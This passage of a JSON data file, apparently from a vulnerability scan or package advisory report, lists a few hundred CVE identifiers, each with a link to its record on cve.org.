"url": "https://www.cve.org/CVERecord?id=CVE-2022-43248"
},
{
"name": "CVE-2016-3418",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-3418"
},
{
"name": "CVE-2022-29824",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29824"
},
{
"name": "CVE-2024-58081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58081"
},
{
"name": "CVE-2022-1705",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1705"
},
{
"name": "CVE-2024-11053",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11053"
},
{
"name": "CVE-2024-7264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
},
{
"name": "CVE-2025-21814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21814"
},
{
"name": "CVE-2025-50082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50082"
},
{
"name": "CVE-2017-6829",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6829"
},
{
"name": "CVE-2025-32462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32462"
},
{
"name": "CVE-2025-40027",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40027"
},
{
"name": "CVE-2025-50097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50097"
},
{
"name": "CVE-2021-4214",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4214"
},
{
"name": "CVE-2025-21911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21911"
},
{
"name": "CVE-2023-24752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24752"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2024-21742",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21742"
},
{
"name": "CVE-2022-43245",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43245"
},
{
"name": "CVE-2015-2656",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2656"
},
{
"name": "CVE-2025-50084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50084"
},
{
"name": "CVE-2018-9133",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-9133"
},
{
"name": "CVE-2025-50079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50079"
},
{
"name": "CVE-2025-38115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38115"
},
{
"name": "CVE-2025-21758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21758"
},
{
"name": "CVE-2023-0767",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0767"
},
{
"name": "CVE-2025-21816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21816"
},
{
"name": "CVE-2025-1795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
},
{
"name": "CVE-2021-35603",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35603"
},
{
"name": "CVE-2025-21996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21996"
},
{
"name": "CVE-2021-36410",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36410"
},
{
"name": "CVE-2025-21780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21780"
},
{
"name": "CVE-2017-3612",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3612"
},
{
"name": "CVE-2024-12705",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12705"
},
{
"name": "CVE-2025-38153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38153"
},
{
"name": "CVE-2025-21787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21787"
},
{
"name": "CVE-2023-28487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28487"
},
{
"name": "CVE-2023-22067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22067"
},
{
"name": "CVE-2023-31439",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31439"
},
{
"name": "CVE-2023-51074",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51074"
},
{
"name": "CVE-2023-23915",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23915"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2018-1000074",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000074"
},
{
"name": "CVE-2025-37785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37785"
},
{
"name": "CVE-2025-21776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21776"
},
{
"name": "CVE-2024-58003",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58003"
},
{
"name": "CVE-2025-21917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21917"
},
{
"name": "CVE-2025-21706",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21706"
},
{
"name": "CVE-2025-48964",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48964"
},
{
"name": "CVE-2025-55193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55193"
},
{
"name": "CVE-2025-38395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38395"
},
{
"name": "CVE-2023-29499",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29499"
},
{
"name": "CVE-2025-21574",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21574"
},
{
"name": "CVE-2022-42011",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42011"
},
{
"name": "CVE-2023-39318",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39318"
},
{
"name": "CVE-2025-38337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38337"
},
{
"name": "CVE-2025-21957",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21957"
},
{
"name": "CVE-2025-38727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38727"
},
{
"name": "CVE-2022-41720",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41720"
},
{
"name": "CVE-2024-1013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1013"
},
{
"name": "CVE-2022-0319",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0319"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2025-30258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30258"
},
{
"name": "CVE-2025-21999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21999"
},
{
"name": "CVE-2025-4565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4565"
},
{
"name": "CVE-2022-41716",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41716"
},
{
"name": "CVE-2025-38465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38465"
},
{
"name": "CVE-2024-56406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56406"
},
{
"name": "CVE-2025-38513",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38513"
},
{
"name": "CVE-2025-21736",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21736"
},
{
"name": "CVE-2025-21997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21997"
},
{
"name": "CVE-2025-21741",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21741"
},
{
"name": "CVE-2020-18032",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-18032"
},
{
"name": "CVE-2017-6833",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6833"
},
{
"name": "CVE-2025-21808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21808"
},
{
"name": "CVE-2019-8324",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8324"
},
{
"name": "CVE-2020-2754",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2754"
},
{
"name": "CVE-2025-38086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38086"
},
{
"name": "CVE-2024-24788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24788"
},
{
"name": "CVE-2024-58076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58076"
},
{
"name": "CVE-2023-24751",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24751"
},
{
"name": "CVE-2025-21708",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21708"
},
{
"name": "CVE-2015-4784",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4784"
},
{
"name": "CVE-2021-4048",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4048"
},
{
"name": "CVE-2023-4527",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4527"
},
{
"name": "CVE-2022-2980",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2980"
},
{
"name": "CVE-2025-5278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5278"
},
{
"name": "CVE-2025-21992",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21992"
},
{
"name": "CVE-2025-21720",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21720"
},
{
"name": "CVE-2025-32463",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32463"
},
{
"name": "CVE-2015-7747",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7747"
},
{
"name": "CVE-2025-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52999"
},
{
"name": "CVE-2023-34055",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34055"
},
{
"name": "CVE-2024-41965",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41965"
},
{
"name": "CVE-2020-14796",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14796"
},
{
"name": "CVE-2024-56433",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56433"
},
{
"name": "CVE-2023-0464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0464"
},
{
"name": "CVE-2025-55004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55004"
},
{
"name": "CVE-2014-8139",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8139"
},
{
"name": "CVE-2025-21580",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21580"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2025-5318",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5318"
},
{
"name": "CVE-2025-38003",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38003"
},
{
"name": "CVE-2025-38441",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38441"
},
{
"name": "CVE-2023-51767",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51767"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2023-6918",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6918"
},
{
"name": "CVE-2023-38037",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38037"
},
{
"name": "CVE-2012-5783",
"url": "https://www.cve.org/CVERecord?id=CVE-2012-5783"
},
{
"name": "CVE-2022-2519",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2519"
},
{
"name": "CVE-2025-55754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55754"
},
{
"name": "CVE-2025-53023",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53023"
},
{
"name": "CVE-2025-21711",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21711"
},
{
"name": "CVE-2025-2998",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2998"
},
{
"name": "CVE-2023-51792",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51792"
},
{
"name": "CVE-2021-20313",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20313"
},
{
"name": "CVE-2022-30633",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30633"
},
{
"name": "CVE-2023-23931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23931"
},
{
"name": "CVE-2025-21575",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21575"
},
{
"name": "CVE-2025-21978",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21978"
},
{
"name": "CVE-2019-16777",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16777"
},
{
"name": "CVE-2025-21760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21760"
},
{
"name": "CVE-2023-45913",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45913"
},
{
"name": "CVE-2018-13153",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13153"
},
{
"name": "CVE-2022-0530",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0530"
},
{
"name": "CVE-2023-48236",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48236"
},
{
"name": "CVE-2025-21947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21947"
},
{
"name": "CVE-2025-21913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21913"
},
{
"name": "CVE-2023-34474",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34474"
},
{
"name": "CVE-2025-21665",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21665"
},
{
"name": "CVE-2025-38227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38227"
},
{
"name": "CVE-2018-1000079",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000079"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2024-58079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58079"
},
{
"name": "CVE-2025-21966",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21966"
},
{
"name": "CVE-2025-21577",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21577"
},
{
"name": "CVE-2021-45931",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45931"
},
{
"name": "CVE-2025-38079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38079"
},
{
"name": "CVE-2021-28544",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28544"
},
{
"name": "CVE-2021-46828",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46828"
},
{
"name": "CVE-2025-21734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21734"
},
{
"name": "CVE-2025-32728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32728"
},
{
"name": "CVE-2023-2804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2804"
},
{
"name": "CVE-2025-21970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21970"
},
{
"name": "CVE-2021-44964",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44964"
},
{
"name": "CVE-2025-6141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6141"
},
{
"name": "CVE-2022-42012",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42012"
},
{
"name": "CVE-2018-14437",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14437"
},
{
"name": "CVE-2024-13978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13978"
},
{
"name": "CVE-2025-21890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21890"
},
{
"name": "CVE-2025-61984",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61984"
},
{
"name": "CVE-2021-3596",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3596"
},
{
"name": "CVE-2025-21916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21916"
},
{
"name": "CVE-2025-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21925"
},
{
"name": "CVE-2024-57883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57883"
},
{
"name": "CVE-2022-21628",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21628"
},
{
"name": "CVE-2017-6830",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6830"
},
{
"name": "CVE-2025-21927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21927"
},
{
"name": "CVE-2021-3520",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3520"
},
{
"name": "CVE-2024-47814",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47814"
},
{
"name": "CVE-2022-2923",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2923"
},
{
"name": "CVE-2025-21799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21799"
},
{
"name": "CVE-2024-21011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21011"
},
{
"name": "CVE-2025-6020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6020"
},
{
"name": "CVE-2015-2626",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2626"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2025-21748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21748"
},
{
"name": "CVE-2025-21785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21785"
},
{
"name": "CVE-2020-10029",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10029"
},
{
"name": "CVE-2025-7425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7425"
},
{
"name": "CVE-2023-3978",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3978"
},
{
"name": "CVE-2021-46310",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46310"
},
{
"name": "CVE-2022-36227",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36227"
},
{
"name": "CVE-2021-2369",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2369"
},
{
"name": "CVE-2025-21883",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21883"
},
{
"name": "CVE-2023-29469",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29469"
},
{
"name": "CVE-2024-5535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5535"
},
{
"name": "CVE-2025-38074",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38074"
},
{
"name": "CVE-2024-58086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58086"
},
{
"name": "CVE-2025-38119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38119"
},
{
"name": "CVE-2025-38245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38245"
},
{
"name": "CVE-2022-37454",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37454"
},
{
"name": "CVE-2021-36770",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36770"
},
{
"name": "CVE-2025-21898",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21898"
},
{
"name": "CVE-2020-14152",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14152"
},
{
"name": "CVE-2025-38324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38324"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2021-36976",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36976"
},
{
"name": "CVE-2024-58051",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58051"
},
{
"name": "CVE-2023-3164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3164"
},
{
"name": "CVE-2022-3597",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3597"
},
{
"name": "CVE-2023-27535",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27535"
},
{
"name": "CVE-2022-27775",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27775"
},
{
"name": "CVE-2024-56337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56337"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2018-25032",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-25032"
},
{
"name": "CVE-2025-9390",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9390"
},
{
"name": "CVE-2025-62813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62813"
},
{
"name": "CVE-2025-21857",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21857"
},
{
"name": "CVE-2019-9904",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9904"
},
{
"name": "CVE-2025-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23085"
},
{
"name": "CVE-2022-42919",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42919"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2025-9165",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9165"
},
{
"name": "CVE-2023-1981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1981"
},
{
"name": "CVE-2023-30571",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30571"
},
{
"name": "CVE-2022-2231",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2231"
},
{
"name": "CVE-2025-46150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46150"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2024-5642",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5642"
},
{
"name": "CVE-2024-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3219"
},
{
"name": "CVE-2025-21812",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21812"
},
{
"name": "CVE-2015-4781",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4781"
},
{
"name": "CVE-2023-23914",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23914"
},
{
"name": "CVE-2025-38542",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38542"
},
{
"name": "CVE-2025-38344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38344"
},
{
"name": "CVE-2023-28120",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28120"
},
{
"name": "CVE-2025-37797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37797"
},
{
"name": "CVE-2025-21848",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21848"
},
{
"name": "CVE-2021-3999",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3999"
},
{
"name": "CVE-2012-6153",
"url": "https://www.cve.org/CVERecord?id=CVE-2012-6153"
},
{
"name": "CVE-2025-38088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38088"
},
{
"name": "CVE-2025-50096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50096"
},
{
"name": "CVE-2022-30632",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30632"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2022-27774",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27774"
},
{
"name": "CVE-2025-21683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21683"
},
{
"name": "CVE-2025-38332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38332"
},
{
"name": "CVE-2020-35492",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35492"
},
{
"name": "CVE-2025-21908",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21908"
},
{
"name": "CVE-2023-1289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1289"
},
{
"name": "CVE-2025-38386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38386"
},
{
"name": "CVE-2023-6349",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6349"
},
{
"name": "CVE-2024-2004",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2004"
},
{
"name": "CVE-2017-3605",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3605"
},
{
"name": "CVE-2025-9232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
},
{
"name": "CVE-2025-23165",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23165"
},
{
"name": "CVE-2022-40303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40303"
},
{
"name": "CVE-2023-0801",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0801"
},
{
"name": "CVE-2025-9341",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9341"
},
{
"name": "CVE-2023-29406",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29406"
},
{
"name": "CVE-2017-7244",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7244"
},
{
"name": "CVE-2023-39319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39319"
},
{
"name": "CVE-2025-21895",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21895"
},
{
"name": "CVE-2025-61795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61795"
},
{
"name": "CVE-2025-1377",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1377"
},
{
"name": "CVE-2025-30705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30705"
},
{
"name": "CVE-2018-16412",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16412"
},
{
"name": "CVE-2025-22005",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22005"
},
{
"name": "CVE-2019-6462",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6462"
},
{
"name": "CVE-2025-21935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21935"
},
{
"name": "CVE-2022-4645",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4645"
},
{
"name": "CVE-2021-32493",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32493"
},
{
"name": "CVE-2023-24754",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24754"
},
{
"name": "CVE-2020-29509",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29509"
},
{
"name": "CVE-2023-5568",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5568"
},
{
"name": "CVE-2023-38470",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38470"
},
{
"name": "CVE-2025-21675",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21675"
},
{
"name": "CVE-2023-34967",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34967"
},
{
"name": "CVE-2025-38237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38237"
},
{
"name": "CVE-2025-38174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38174"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2022-2869",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2869"
},
{
"name": "CVE-2021-4189",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4189"
},
{
"name": "CVE-2025-50088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50088"
},
{
"name": "CVE-2024-24785",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24785"
},
{
"name": "CVE-2023-35945",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35945"
},
{
"name": "CVE-2024-45993",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45993"
},
{
"name": "CVE-2025-6170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6170"
},
{
"name": "CVE-2021-35937",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35937"
},
{
"name": "CVE-2024-58019",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58019"
},
{
"name": "CVE-2025-9900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9900"
},
{
"name": "CVE-2024-26146",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26146"
},
{
"name": "CVE-2025-21888",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21888"
},
{
"name": "CVE-2025-21866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21866"
},
{
"name": "CVE-2023-40745",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40745"
},
{
"name": "CVE-2022-1962",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1962"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2025-3730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3730"
},
{
"name": "CVE-2025-22010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22010"
},
{
"name": "CVE-2024-25260",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25260"
},
{
"name": "CVE-2024-21147",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21147"
},
{
"name": "CVE-2025-38037",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38037"
},
{
"name": "CVE-2017-3609",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3609"
},
{
"name": "CVE-2024-57990",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57990"
},
{
"name": "CVE-2021-29921",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29921"
},
{
"name": "CVE-2022-41717",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41717"
},
{
"name": "CVE-2014-9636",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9636"
},
{
"name": "CVE-2025-5351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5351"
},
{
"name": "CVE-2025-52520",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52520"
},
{
"name": "CVE-2022-1622",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1622"
},
{
"name": "CVE-2017-3611",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3611"
},
{
"name": "CVE-2024-53427",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53427"
},
{
"name": "CVE-2022-2521",
